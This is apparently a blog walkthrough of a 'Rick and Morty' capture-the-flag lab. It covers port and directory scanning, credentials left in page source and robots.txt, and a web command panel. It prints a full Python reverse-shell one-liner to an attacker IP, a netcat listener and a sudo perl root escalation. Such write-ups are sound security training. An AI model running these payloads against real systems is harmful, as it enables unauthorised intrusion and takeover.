A Rick and Morty CTF. Help turn Rick back into a human!
Before deploying the machine make sure you have you VPN ready.
Now will deploy the machine after the VPN is enabled.
Performing a nmap scan we see that we have 2 ports open(22 and 80). So that’s means we have a webpage also.
nmap -sC -sV -p- — min-rate=10000 -oN nmap <Target_IP>
We have a webpage
Checking source code and robots.txt
We get the username in the source code of the page.
In robots.txt we have a string that might be passoword.
Running gobutser and found out the login page.
gobuster dir -u <IP> -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,htm
We get a login page and we use the username and password we found earlier from the source code and the robots.txt
We get an option to input commands and execute them.
on doing an
ls the command we see all the files.
Instead of giving commands here, I choose to get a python reverse shell.
Checking if python exists.
And yes it has python3
Now executing our payload.
python3 -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“<Attacker_IP>”,4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’
Before Executing make sure your netcat is listening on the mentioned PORT.
Got the Reverse Shell on port 4444
nc -nlvp 4444
2nd Flag is inside the /rick directory
Checking the permissions and we find out that we can run all the commands on the system as sudo.
We can see that this user can run everything as sudo user.
I used sudo perl command to become root.
sudo perl -e ‘exec “/bin/sh”;’
In the root directory, we find the root flag as 3rd.txt
and we successfully finished the room and helped rick turn back into his natural form.
Leave some Claps if you found this useful.